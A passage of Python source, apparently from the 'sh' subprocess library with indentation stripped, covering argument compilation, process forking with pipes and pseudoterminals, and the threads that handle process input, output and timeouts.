call_args["ok_code"] = [call_args["ok_code"]]
# check if we're piping via composition
stdin = call_args["in"]
if args:
first_arg = args.pop(0)
if isinstance(first_arg, RunningCommand):
if first_arg.call_args["piped"]:
stdin = first_arg.process
else:
stdin = first_arg.process._pipe_queue
else:
args.insert(0, first_arg)
processed_args = compile_args(args, kwargs, call_args["long_sep"], call_args["long_prefix"])
# makes sure our arguments are broken up correctly
split_args = self._partial_baked_args + processed_args
final_args = split_args
cmd.extend(final_args)
# if we're running in foreground mode, we need to completely bypass
# launching a RunningCommand and OProc and just do a spawn
if call_args["fg"]:
cwd = call_args["cwd"] or os.getcwd()
with pushd(cwd):
if call_args["env"] is None:
exit_code = os.spawnv(os.P_WAIT, cmd[0], cmd)
else:
exit_code = os.spawnve(os.P_WAIT, cmd[0], cmd, call_args["env"])
exc_class = get_exc_exit_code_would_raise(exit_code, call_args["ok_code"], call_args["piped"])
if exc_class:
if IS_PY3:
ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd])
else:
ran = " ".join(cmd)
exc = exc_class(ran, b"", b"", call_args["truncate_exc"])
raise exc
return None
# stdout redirection
stdout = call_args["out"]
if output_redirect_is_filename(stdout):
stdout = open(str(stdout), "wb")
# stderr redirection
stderr = call_args["err"]
if output_redirect_is_filename(stderr):
stderr = open(str(stderr), "wb")
return RunningCommand(cmd, call_args, stdin, stdout, stderr)
def compile_args(a, kwargs, sep, prefix):
""" takes args and kwargs, as they were passed into the command instance
being executed with __call__, and compose them into a flat list that
will eventually be fed into exec. example:
with this call:
sh.ls("-l", "/tmp", color="never")
this function receives
args = ['-l', '/tmp']
kwargs = {'color': 'never'}
and produces
['-l', '/tmp', '--color=never']
"""
processed_args = []
encode = encode_to_py3bytes_or_py2str
# aggregate positional args
for arg in a:
if isinstance(arg, (list, tuple)):
if isinstance(arg, GlobResults) and not arg:
arg = [arg.path]
for sub_arg in arg:
processed_args.append(encode(sub_arg))
elif isinstance(arg, dict):
processed_args += aggregate_keywords(arg, sep, prefix, raw=True)
# see https://github.com/amoffat/sh/issues/522
elif arg is None or arg is False:
pass
else:
processed_args.append(encode(arg))
# aggregate the keyword arguments
processed_args += aggregate_keywords(kwargs, sep, prefix)
return processed_args
def aggregate_keywords(keywords, sep, prefix, raw=False):
""" take our keyword arguments, and a separator, and compose the list of
flat long (and short) arguments. example
{'color': 'never', 't': True, 'something': True} with sep '='
becomes
['--color=never', '-t', '--something']
the `raw` argument indicates whether or not we should leave the argument
name alone, or whether we should replace "_" with "-". if we pass in a
dictionary, like this:
sh.command({"some_option": 12})
then `raw` gets set to True, because we want to leave the key as-is, to
produce:
['--some_option=12']
but if we just use a command's kwargs, `raw` is False, which means this:
sh.command(some_option=12)
becomes:
['--some-option=12']
essentially, using kwargs is a convenience, but it lacks the ability to
put a '-' in the name, so we do the replacement of '_' to '-' for you.
but when you really don't want that to happen, you should use a
dictionary instead with the exact names you want
"""
processed = []
encode = encode_to_py3bytes_or_py2str
for k, v in keywords.items():
# we're passing a short arg as a kwarg, example:
# cut(d="\t")
if len(k) == 1:
if v is not False:
processed.append(encode("-" + k))
if v is not True:
processed.append(encode(v))
# we're doing a long arg
else:
if not raw:
k = k.replace("_", "-")
if v is True:
processed.append(encode(prefix + k))
elif v is False:
pass
elif sep is None or sep == " ":
processed.append(encode(prefix + k))
processed.append(encode(v))
else:
arg = encode("%s%s%s%s" % (prefix, k, sep, v))
processed.append(arg)
return processed
def _start_daemon_thread(fn, name, exc_queue, *a):
def wrap(*rgs, **kwargs):
try:
fn(*rgs, **kwargs)
except Exception as e:
exc_queue.put(e)
raise
thread = threading.Thread(target=wrap, name=name, args=a)
thread.daemon = True
thread.start()
return thread
def setwinsize(fd, rows_cols):
""" set the terminal size of a tty file descriptor. borrowed logic
from pexpect.py """
rows, cols = rows_cols
winsize = getattr(termios, 'TIOCSWINSZ', -2146929561)
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, winsize, s)
def construct_streamreader_callback(process, handler):
""" here we're constructing a closure for our streamreader callback. this
is used in the case that we pass a callback into _out or _err, meaning we
want to our callback to handle each bit of output
we construct the closure based on how many arguments it takes. the reason
for this is to make it as easy as possible for people to use, without
limiting them. a new user will assume the callback takes 1 argument (the
data). as they get more advanced, they may want to terminate the process,
or pass some stdin back, and will realize that they can pass a callback of
more args """
# implied arg refers to the "self" that methods will pass in. we need to
# account for this implied arg when figuring out what function the user
# passed in based on number of args
implied_arg = 0
partial_args = 0
handler_to_inspect = handler
if isinstance(handler, partial):
partial_args = len(handler.args)
handler_to_inspect = handler.func
if inspect.ismethod(handler_to_inspect):
implied_arg = 1
num_args = get_num_args(handler_to_inspect)
else:
if inspect.isfunction(handler_to_inspect):
num_args = get_num_args(handler_to_inspect)
# is an object instance with __call__ method
else:
implied_arg = 1
num_args = get_num_args(handler_to_inspect.__call__)
net_args = num_args - implied_arg - partial_args
handler_args = ()
# just the chunk
if net_args == 1:
handler_args = ()
# chunk, stdin
if net_args == 2:
handler_args = (process.stdin,)
# chunk, stdin, process
elif net_args == 3:
# notice we're only storing a weakref, to prevent cyclic references
# (where the process holds a streamreader, and a streamreader holds a
# handler-closure with a reference to the process
handler_args = (process.stdin, weakref.ref(process))
def fn(chunk):
# this is pretty ugly, but we're evaluating the process at call-time,
# because it's a weakref
a = handler_args
if len(a) == 2:
a = (handler_args[0], handler_args[1]())
return handler(chunk, *a)
return fn
def get_exc_exit_code_would_raise(exit_code, ok_codes, sigpipe_ok):
exc = None
success = exit_code in ok_codes
bad_sig = -exit_code in SIGNALS_THAT_SHOULD_THROW_EXCEPTION
# if this is a piped command, SIGPIPE must be ignored by us and not raise an
# exception, since it's perfectly normal for the consumer of a process's
# pipe to terminate early
if sigpipe_ok and -exit_code == signal.SIGPIPE:
bad_sig = False
success = True
if not success or bad_sig:
exc = get_rc_exc(exit_code)
return exc
def handle_process_exit_code(exit_code):
""" this should only ever be called once for each child process """
# if we exited from a signal, let our exit code reflect that
if os.WIFSIGNALED(exit_code):
exit_code = -os.WTERMSIG(exit_code)
# otherwise just give us a normal exit code
elif os.WIFEXITED(exit_code):
exit_code = os.WEXITSTATUS(exit_code)
else:
raise RuntimeError("Unknown child exit status!")
return exit_code
def no_interrupt(syscall, *args, **kwargs):
""" a helper for making system calls immune to EINTR """
ret = None
while True:
try:
ret = syscall(*args, **kwargs)
except OSError as e:
if e.errno == errno.EINTR:
continue
else:
raise
else:
break
return ret
class OProc(object):
""" this class is instantiated by RunningCommand for a command to be exec'd.
it handles all the nasty business involved with correctly setting up the
input/output to the child process. it gets its name for subprocess.Popen
(process open) but we're calling ours OProc (open process) """
_default_window_size = (24, 80)
# used in redirecting
STDOUT = -1
STDERR = -2
def __init__(self, command, parent_log, cmd, stdin, stdout, stderr, call_args, pipe, process_assign_lock):
"""
cmd is the full list of arguments that will be exec'd. it includes the program name and all its arguments.
stdin, stdout, stderr are what the child will use for standard input/output/err.
call_args is a mapping of all the special keyword arguments to apply to the child process.
"""
self.command = command
self.call_args = call_args
# convenience
ca = self.call_args
if ca["uid"] is not None:
if os.getuid() != 0:
raise RuntimeError("UID setting requires root privileges")
target_uid = ca["uid"]
pwrec = pwd.getpwuid(ca["uid"])
target_gid = pwrec.pw_gid
else:
target_uid, target_gid = None, None
# I had issues with getting 'Input/Output error reading stdin' from dd,
# until I set _tty_out=False
if ca["piped"]:
ca["tty_out"] = False
self._stdin_process = None
# if the objects that we are passing to the OProc happen to be a
# file-like object that is a tty, for example `sys.stdin`, then, later
# on in this constructor, we're going to skip out on setting up pipes
# and pseudoterminals for those endpoints
stdin_is_fd_based = ob_is_fd_based(stdin)
stdout_is_fd_based = ob_is_fd_based(stdout)
stderr_is_fd_based = ob_is_fd_based(stderr)
tee_out = ca["tee"] in (True, "out")
tee_err = ca["tee"] == "err"
single_tty = ca["tty_in"] and ca["tty_out"] and ca["unify_ttys"]
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
# output correctly (is if stdout and stdin are both the same TTY)
if single_tty:
# master_fd, slave_fd = pty.openpty()
#
# Anything that is written on the master end is provided to the process on the slave end as though it was
# input typed on a terminal. -"man 7 pty"
#
# later, in the child process, we're going to do this, so keep it in mind:
#
# os.dup2(self._stdin_child_fd, 0)
# os.dup2(self._stdout_child_fd, 1)
# os.dup2(self._stderr_child_fd, 2)
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# this makes our parent fds behave like a terminal. it says that the very same fd that we "type" to (for
# stdin) is the same one that we see output printed to (for stdout)
self._stdout_parent_fd = os.dup(self._stdin_parent_fd)
# this line is what makes stdout and stdin attached to the same pty. in other words the process will write
# to the same underlying fd as stdout as it uses to read from for stdin. this makes programs like ssh happy
self._stdout_child_fd = os.dup(self._stdin_child_fd)
self._stderr_parent_fd = os.dup(self._stdin_parent_fd)
self._stderr_child_fd = os.dup(self._stdin_child_fd)
# do not consolidate stdin and stdout. this is the most common use-
# case
else:
# this check here is because we may be doing piping and so our stdin
# might be an instance of OProc
if isinstance(stdin, OProc) and stdin.call_args["piped"]:
self._stdin_child_fd = stdin._pipe_fd
self._stdin_parent_fd = None
self._stdin_process = stdin
elif stdin_is_fd_based:
self._stdin_child_fd = os.dup(get_fileno(stdin))
self._stdin_parent_fd = None
elif ca["tty_in"]:
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# tty_in=False is the default
else:
self._stdin_child_fd, self._stdin_parent_fd = os.pipe()
if stdout_is_fd_based and not tee_out:
self._stdout_child_fd = os.dup(get_fileno(stdout))
self._stdout_parent_fd = None
# tty_out=True is the default
elif ca["tty_out"]:
self._stdout_parent_fd, self._stdout_child_fd = pty.openpty()
else:
self._stdout_parent_fd, self._stdout_child_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is OProc.STDOUT:
# if stderr is going to stdout, but stdout is a tty or a pipe,
# we should not specify a read_fd, because stdout is os.dup'ed
# directly to the stdout fd (no pipe), and so stderr won't have
# a slave end of a pipe either to dup
if stdout_is_fd_based and not tee_out:
self._stderr_parent_fd = None
else:
self._stderr_parent_fd = os.dup(self._stdout_parent_fd)
self._stderr_child_fd = os.dup(self._stdout_child_fd)
elif stderr_is_fd_based and not tee_err:
self._stderr_child_fd = os.dup(get_fileno(stderr))
self._stderr_parent_fd = None
else:
self._stderr_parent_fd, self._stderr_child_fd = os.pipe()
piped = ca["piped"]
self._pipe_fd = None
if piped:
fd_to_use = self._stdout_parent_fd
if piped == "err":
fd_to_use = self._stderr_parent_fd
self._pipe_fd = os.dup(fd_to_use)
new_session = ca["new_session"]
needs_ctty = ca["tty_in"] and new_session
self.ctty = None
if needs_ctty:
self.ctty = os.ttyname(self._stdin_child_fd)
gc_enabled = gc.isenabled()
if gc_enabled:
gc.disable()
# for synchronizing
session_pipe_read, session_pipe_write = os.pipe()
exc_pipe_read, exc_pipe_write = os.pipe()
# this pipe is for synchronizing with the child that the parent has
# closed its in/out/err fds. this is a bug on OSX (but not linux),
# where we can lose output sometimes, due to a race, if we do
# os.close(self._stdout_child_fd) in the parent after the child starts
# writing.
if IS_MACOS:
close_pipe_read, close_pipe_write = os.pipe()
else:
close_pipe_read, close_pipe_write = None, None
# session id, group id, process id
self.sid = None
self.pgid = None
self.pid = os.fork()
# child
if self.pid == 0: # pragma: no cover
if IS_MACOS:
os.read(close_pipe_read, 1)
os.close(close_pipe_read)
os.close(close_pipe_write)
# this is critical
# our exc_pipe_write must have CLOEXEC enabled. the reason for this is tricky:
# if our child (the block we're in now), has an exception, we need to be able to write to exc_pipe_write, so
# that when the parent does os.read(exc_pipe_read), it gets our traceback. however, os.read(exc_pipe_read)
# in the parent blocks, so if our child *doesn't* have an exception, and doesn't close the writing end, it
# hangs forever. not good! but obviously the child can't close the writing end until it knows it's not
# going to have an exception, which is impossible to know because but what if os.execv has an exception? so
# the answer is CLOEXEC, so that the writing end of the pipe gets closed upon successful exec, and the
# parent reading the read end won't block (close breaks the block).
flags = fcntl.fcntl(exc_pipe_write, fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(exc_pipe_write, fcntl.F_SETFD, flags)
try:
# ignoring SIGHUP lets us persist even after the parent process
# exits. only ignore if we're backgrounded
if ca["bg"] is True:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# python ignores SIGPIPE by default. we must make sure to put
# this behavior back to the default for spawned processes,
# otherwise SIGPIPE won't kill piped processes, which is what we
# need, so that we can check the error code of the killed
# process to see that SIGPIPE killed it
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
# put our forked process in a new session? this will relinquish
# any control of our inherited CTTY and also make our parent
# process init
if new_session:
os.setsid()
# if we're not going in a new session, we should go in a new
# process group. this way, our process, and any children it
# spawns, are alone, contained entirely in one group. if we
# didn't do this, and didn't use a new session, then our exec'd
# process *could* exist in the same group as our python process,
# depending on how we launch the process (from a shell, or some
# other way)
else:
os.setpgrp()
sid = os.getsid(0)
pgid = os.getpgid(0)
payload = ("%d,%d" % (sid, pgid)).encode(DEFAULT_ENCODING)
os.write(session_pipe_write, payload)
if ca["tty_out"] and not stdout_is_fd_based and not single_tty:
# set raw mode, so there isn't any weird translation of
# newlines to \r\n and other oddities. we're not outputting
# to a terminal anyways
#
# we HAVE to do this here, and not in the parent process,
# because we have to guarantee that this is set before the
# child process is run, and we can't do it twice.
tty.setraw(self._stdout_child_fd)
# if the parent-side fd for stdin exists, close it. the case
# where it may not exist is if we're using piping
if self._stdin_parent_fd:
os.close(self._stdin_parent_fd)
if self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
if self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
os.close(session_pipe_read)
os.close(exc_pipe_read)
cwd = ca["cwd"]
if cwd:
os.chdir(cwd)
os.dup2(self._stdin_child_fd, 0)
os.dup2(self._stdout_child_fd, 1)
os.dup2(self._stderr_child_fd, 2)
# set our controlling terminal, but only if we're using a tty
# for stdin. it doesn't make sense to have a ctty otherwise
if needs_ctty:
tmp_fd = os.open(os.ttyname(0), os.O_RDWR)
os.close(tmp_fd)
if ca["tty_out"] and not stdout_is_fd_based:
setwinsize(1, ca["tty_size"])
if ca["uid"] is not None:
os.setgid(target_gid)
os.setuid(target_uid)
preexec_fn = ca["preexec_fn"]
if callable(preexec_fn):
preexec_fn()
close_fds = ca["close_fds"]
if ca["pass_fds"]:
close_fds = True
if close_fds:
pass_fds = set((0, 1, 2, exc_pipe_write))
pass_fds.update(ca["pass_fds"])
# don't inherit file descriptors
inherited_fds = os.listdir("/dev/fd")
inherited_fds = set(int(fd) for fd in inherited_fds) - pass_fds
for fd in inherited_fds:
try:
os.close(fd)
except OSError:
pass
# actually execute the process
if ca["env"] is None:
os.execv(cmd[0], cmd)
else:
os.execve(cmd[0], cmd, ca["env"])
# we must ensure that we carefully exit the child process on
# exception, otherwise the parent process code will be executed
# twice on exception https://github.com/amoffat/sh/issues/202
#
# if your parent process experiences an exit code 255, it is most
# likely that an exception occurred between the fork of the child
# and the exec. this should be reported.
except: # noqa: E722
# some helpful debugging
tb = traceback.format_exc().encode("utf8", "ignore")
try:
os.write(exc_pipe_write, tb)
except Exception as e:
# dump to stderr if we cannot save it to exc_pipe_write
sys.stderr.write("\nFATAL SH ERROR: %s\n" % e)
finally:
os._exit(255)
# parent
else:
if gc_enabled:
gc.enable()
os.close(self._stdin_child_fd)
os.close(self._stdout_child_fd)
os.close(self._stderr_child_fd)
# tell our child process that we've closed our write_fds, so it is
# ok to proceed towards exec. see the comment where this pipe is
# opened, for why this is necessary
if IS_MACOS:
os.close(close_pipe_read)
os.write(close_pipe_write, str(1).encode(DEFAULT_ENCODING))
os.close(close_pipe_write)
os.close(exc_pipe_write)
fork_exc = os.read(exc_pipe_read, 1024 ** 2)
os.close(exc_pipe_read)
if fork_exc:
fork_exc = fork_exc.decode(DEFAULT_ENCODING)
raise ForkException(fork_exc)
os.close(session_pipe_write)
sid, pgid = os.read(session_pipe_read, 1024).decode(DEFAULT_ENCODING).split(",")
os.close(session_pipe_read)
self.sid = int(sid)
self.pgid = int(pgid)
# used to determine what exception to raise. if our process was
# killed via a timeout counter, we'll raise something different than
# a SIGKILL exception
self.timed_out = False
self.started = time.time()
self.cmd = cmd
# exit code should only be manipulated from within self._wait_lock
# to prevent race conditions
self.exit_code = None
self.stdin = stdin
# this accounts for when _out is a callable that is passed stdin. in that case, if stdin is unspecified, we
# must set it to a queue, so callbacks can put things on it
if callable(ca["out"]) and self.stdin is None:
self.stdin = Queue()
# _pipe_queue is used internally to hand off stdout from one process
# to another. by default, all stdout from a process gets dumped
# into this pipe queue, to be consumed in real time (hence the
# thread-safe Queue), or at a potentially later time
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
# for the processes's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=ca["internal_bufsize"])
self._stderr = deque(maxlen=ca["internal_bufsize"])
if ca["tty_in"] and not stdin_is_fd_based:
setwinsize(self._stdin_parent_fd, ca["tty_size"])
self.log = parent_log.get_child("process", repr(self))
self.log.debug("started process")
# disable echoing, but only if it's a tty that we created ourselves
if ca["tty_in"] and not stdin_is_fd_based:
attr = termios.tcgetattr(self._stdin_parent_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_parent_fd, termios.TCSANOW, attr)
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = None
if self._stdin_parent_fd:
log = self.log.get_child("streamwriter", "stdin")
self._stdin_stream = StreamWriter(log, self._stdin_parent_fd, self.stdin,
ca["in_bufsize"], ca["encoding"], ca["tty_in"])
stdout_pipe = None
if pipe is OProc.STDOUT and not ca["no_pipe"]:
stdout_pipe = self._pipe_queue
# this represents the connection from a process's STDOUT fd to
# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
save_stdout = not ca["no_out"] and (tee_out or stdout is None)
pipe_out = ca["piped"] in ("out", True)
pipe_err = ca["piped"] in ("err",)
# if we're piping directly into another process's file descriptor, we
# bypass reading from the stdout stream altogether, because we've
# already hooked up this processes's stdout fd to the other
# processes's stdin fd
self._stdout_stream = None
if not pipe_out and self._stdout_parent_fd:
if callable(stdout):
stdout = construct_streamreader_callback(self, stdout)
self._stdout_stream = StreamReader(
self.log.get_child("streamreader", "stdout"),
self._stdout_parent_fd, stdout, self._stdout,
ca["out_bufsize"], ca["encoding"],
ca["decode_errors"], stdout_pipe,
save_data=save_stdout
)
elif self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
# if stderr is going to one place (because it's grouped with stdout,
# or we're dealing with a single tty), then we don't actually need a
# stream reader for stderr, because we've already set one up for
# stdout above
self._stderr_stream = None
if stderr is not OProc.STDOUT and not single_tty and not pipe_err and self._stderr_parent_fd:
stderr_pipe = None
if pipe is OProc.STDERR and not ca["no_pipe"]:
stderr_pipe = self._pipe_queue
save_stderr = not ca["no_err"] and (ca["tee"] in ("err",) or stderr is None)
if callable(stderr):
stderr = construct_streamreader_callback(self, stderr)
self._stderr_stream = StreamReader(
Logger("streamreader"),
self._stderr_parent_fd, stderr, self._stderr,
ca["err_bufsize"], ca["encoding"], ca["decode_errors"],
stderr_pipe, save_data=save_stderr
)
elif self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
def timeout_fn():
self.timed_out = True
self.signal(ca["timeout_signal"])
self._timeout_event = None
self._timeout_timer = None
if ca["timeout"]:
self._timeout_event = threading.Event()
self._timeout_timer = threading.Timer(ca["timeout"], self._timeout_event.set)
self._timeout_timer.start()
# this is for cases where we know that the RunningCommand that was
# launched was not .wait()ed on to complete. in those unique cases,
# we allow the thread that processes output to report exceptions in
# that thread. it's important that we only allow reporting of the
# exception, and nothing else (like the additional stuff that
# RunningCommand.wait() does), because we want the exception to be
# re-raised in the future, if we DO call .wait()
handle_exit_code = None
if not self.command._spawned_and_waited and ca["bg_exc"]:
def fn(exit_code):
with process_assign_lock:
return self.command.handle_command_exit_code(exit_code)
handle_exit_code = fn
self._quit_threads = threading.Event()
thread_name = "background thread for pid %d" % self.pid
self._bg_thread_exc_queue = Queue(1)
self._background_thread = _start_daemon_thread(
background_thread,
thread_name, self._bg_thread_exc_queue, timeout_fn,
self._timeout_event, handle_exit_code, self.is_alive,
self._quit_threads
)
# start the main io threads. stdin thread is not needed if we are
# connecting from another process's stdout pipe
self._input_thread = None
self._input_thread_exc_queue = Queue(1)
if self._stdin_stream:
close_before_term = not needs_ctty
thread_name = "STDIN thread for pid %d" % self.pid
self._input_thread = _start_daemon_thread(
input_thread,
thread_name, self._input_thread_exc_queue, self.log,
self._stdin_stream, self.is_alive, self._quit_threads,
close_before_term
)
# this event is for cases where the subprocess that we launch
# launches its OWN subprocess and os.dup's the stdout/stderr fds to that
# new subprocess. in that case, stdout and stderr will never EOF,
# so our output_thread will never finish and will hang. this event
# prevents that hanging
self._stop_output_event = threading.Event()
self._output_thread_exc_queue = Queue(1)
thread_name = "STDOUT/ERR thread for pid %d" % self.pid
self._output_thread = _start_daemon_thread(
output_thread,
thread_name, self._output_thread_exc_queue, self.log,
self._stdout_stream, self._stderr_stream,
self._timeout_event, self.is_alive, self._quit_threads,
self._stop_output_event
)
def __repr__(self):
return "<Process %d %r>" % (self.pid, self.cmd[:500])
# these next 3 properties are primary for tests
@property
def output_thread_exc(self):
exc = None
try:
exc = self._output_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def input_thread_exc(self):
exc = None
try:
exc = self._input_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def bg_thread_exc(self):
exc = None
try:
exc = self._bg_thread_exc_queue.get(False)
except Empty:
pass
return exc
def change_in_bufsize(self, buf):
self._stdin_stream.stream_bufferer.change_buffering(buf)
def change_out_bufsize(self, buf):
self._stdout_stream.stream_bufferer.change_buffering(buf)
def change_err_bufsize(self, buf):
self._stderr_stream.stream_bufferer.change_buffering(buf)
@property
def stdout(self):
return "".encode(self.call_args["encoding"]).join(self._stdout)
@property
def stderr(self):
return "".encode(self.call_args["encoding"]).join(self._stderr)
def get_pgid(self):
""" return the CURRENT group id of the process. this differs from
self.pgid in that this reflects the current state of the process, where
self.pgid is the group id at launch """
return os.getpgid(self.pid)
def get_sid(self):
""" return the CURRENT session id of the process. this differs from
self.sid in that this reflects the current state of the process, where
self.sid is the session id at launch """
return os.getsid(self.pid)
def signal_group(self, sig):
self.log.debug("sending signal %d to group", sig)
os.killpg(self.get_pgid(), sig)
def signal(self, sig):
self.log.debug("sending signal %d", sig)
os.kill(self.pid, sig)
def kill_group(self):
self.log.debug("killing group")
self.signal_group(signal.SIGKILL)
def kill(self):
self.log.debug("killing")
self.signal(signal.SIGKILL)
def terminate(self):
self.log.debug("terminating")
self.signal(signal.SIGTERM)
def is_alive(self):
""" polls if our child process has completed, without blocking. this
method has side-effects, such as setting our exit_code, if we happen to
see our child exit while this is running """
if self.exit_code is not None:
return False, self.exit_code
# what we're doing here essentially is making sure that the main thread
# (or another thread), isn't calling .wait() on the process. because
# .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
# here...because if we did, and the process exited while in this
# thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
# (because the process ended in another thread).
#
# so essentially what we're doing is, using this lock, checking if
# we're calling .wait(), and if we are, let .wait() get the exit code
# and handle the status, otherwise let us do it.
acquired = self._wait_lock.acquire(False)
if not acquired:
if self.exit_code is not None:
return False, self.exit_code
return True, self.exit_code
try:
# WNOHANG is just that...we're calling waitpid without hanging...
# essentially polling the process. the return result is (0, 0) if
# there's no process status, so we check that pid == self.pid below
# in order to determine how to proceed
pid, exit_code = no_interrupt(os.waitpid, self.pid, os.WNOHANG)
if pid == self.pid:
self.exit_code = handle_process_exit_code(exit_code)
self._process_just_ended()
return False, self.exit_code
# no child process
except OSError:
return False, self.exit_code
else:
return True, self.exit_code
finally:
self._wait_lock.release()
def _process_just_ended(self):
if self._timeout_timer:
self._timeout_timer.cancel()
done_callback = self.call_args["done"]
if done_callback:
success = self.exit_code in self.call_args["ok_code"]
done_callback(success, self.exit_code)
# this can only be closed at the end of the process, because it might be
# the CTTY, and closing it prematurely will send a SIGHUP. we also
# don't want to close it if there's a self._stdin_stream, because that
# is in charge of closing it also
if self._stdin_parent_fd and not self._stdin_stream:
os.close(self._stdin_parent_fd)
def wait(self):
""" waits for the process to complete, handles the exit code """
self.log.debug("acquiring wait lock to wait for completion")
# using the lock in a with-context blocks, which is what we want if
# we're running wait()
with self._wait_lock:
self.log.debug("got wait lock")
witnessed_end = False
if self.exit_code is None:
self.log.debug("exit code not set, waiting on pid")
pid, exit_code = no_interrupt(os.waitpid, self.pid, 0) # blocks
self.exit_code = handle_process_exit_code(exit_code)
witnessed_end = True
else:
self.log.debug("exit code already set (%d), no need to wait", self.exit_code)
self._quit_threads.set()
# we may not have a thread for stdin, if the pipe has been connected
# via _piped="direct"
if self._input_thread:
self._input_thread.join()
# wait, then signal to our output thread that the child process is
# done, and we should have finished reading all the stdout/stderr
# data that we can by now
timer = threading.Timer(2.0, self._stop_output_event.set)
timer.start()
# wait for our stdout and stderr streamreaders to finish reading and
# aggregating the process output
self._output_thread.join()
timer.cancel()
self._background_thread.join()
if witnessed_end:
self._process_just_ended()
return self.exit_code
def input_thread(log, stdin, is_alive, quit_thread, close_before_term):
""" this is run in a separate thread. it writes into our process's
stdin (a streamwriter) and waits the process to end AND everything that
can be written to be written """
closed = False
alive = True
poller = Poller()
poller.register_write(stdin)
while poller and alive:
changed = poller.poll(1)
for fd, events in changed:
if events & (POLLER_EVENT_WRITE | POLLER_EVENT_HUP):
log.debug("%r ready for more input", stdin)
done = stdin.write()
if done:
poller.unregister(stdin)
if close_before_term:
stdin.close()
closed = True
alive, _ = is_alive()
while alive:
quit_thread.wait(1)
alive, _ = is_alive()
if not closed:
stdin.close()
def event_wait(ev, timeout=None):
triggered = ev.wait(timeout)
if IS_PY26:
triggered = ev.is_set()
return triggered
def background_thread(timeout_fn, timeout_event, handle_exit_code, is_alive, quit_thread):
""" handles the timeout logic """
# if there's a timeout event, loop
if timeout_event:
while not quit_thread.is_set():
timed_out = event_wait(timeout_event, 0.1)
if timed_out:
timeout_fn()
break
# handle_exit_code will be a function ONLY if our command was NOT waited on
# as part of its spawning. in other words, it's probably a background
# command
#
# this reports the exit code exception in our thread. it's purely for the
# user's awareness, and cannot be caught or used in any way, so it's ok to
# suppress this during the tests
if handle_exit_code and not RUNNING_TESTS: # pragma: no cover
alive = True
exit_code = None
while alive:
quit_thread.wait(1)
alive, exit_code = is_alive()
handle_exit_code(exit_code)
def output_thread(log, stdout, stderr, timeout_event, is_alive, quit_thread, stop_output_event):
""" this function is run in a separate thread. it reads from the
process's stdout stream (a streamreader), and waits for it to claim that
its done """
poller = Poller()
if stdout is not None:
poller.register_read(stdout)
if stderr is not None:
poller.register_read(stderr)
# this is our poll loop for polling stdout or stderr that is ready to
# be read and processed. if one of those streamreaders indicate that it
# is done altogether being read from, we remove it from our list of
# things to poll. when no more things are left to poll, we leave this
# loop and clean up
while poller:
changed = no_interrupt(poller.poll, 0.1)
for f, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
log.debug("%r ready to be read from", f)
done = f.read()
if done:
poller.unregister(f)
elif events & POLLER_EVENT_ERROR:
# for some reason, we have to just ignore streams that have had an
# error. i'm not exactly sure why, but don't remove this until we
# figure that out, and create a test for it
pass
if timeout_event and timeout_event.is_set():
break
if stop_output_event.is_set():
break
# we need to wait until the process is guaranteed dead before closing our
# outputs, otherwise SIGPIPE
alive, _ = is_alive()
while alive:
quit_thread.wait(1)
alive, _ = is_alive()
if stdout:
stdout.close()
if stderr:
stderr.close()
class DoneReadingForever(Exception):
pass
class NotYetReadyToRead(Exception):
pass
def determine_how_to_read_input(input_obj):
""" given some kind of input object, return a function that knows how to
read chunks of that input object.
each reader function should return a chunk and raise a DoneReadingForever
exception, or return None, when there's no more data to read
NOTE: the function returned does not need to care much about the requested
buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer
will take care of that. these functions just need to return a
reasonably-sized chunk of data. """
if isinstance(input_obj, Queue):
log_msg = "queue"
get_chunk = get_queue_chunk_reader(input_obj)
elif callable(input_obj):
log_msg = "callable"
get_chunk = get_callable_chunk_reader(input_obj)
# also handles stringio
elif hasattr(input_obj, "read"):
log_msg = "file descriptor"
get_chunk = get_file_chunk_reader(input_obj)
elif isinstance(input_obj, basestring):
log_msg = "string"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, bytes):
log_msg = "bytes"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, GeneratorType):
log_msg = "generator"
get_chunk = get_iter_chunk_reader(iter(input_obj))
elif input_obj is None:
log_msg = "None"
def raise_():
raise DoneReadingForever
get_chunk = raise_
else:
try:
it = iter(input_obj)
except TypeError:
raise Exception("unknown input object")
else:
log_msg = "general iterable"
get_chunk = get_iter_chunk_reader(it)
return get_chunk, log_msg
def get_queue_chunk_reader(stdin):
def fn():
try:
chunk = stdin.get(True, 0.1)
except Empty:
raise NotYetReadyToRead
if chunk is None:
raise DoneReadingForever
return chunk
return fn
def get_callable_chunk_reader(stdin):
def fn():
try:
data = stdin()
except DoneReadingForever:
raise
if not data:
raise DoneReadingForever
return data
return fn
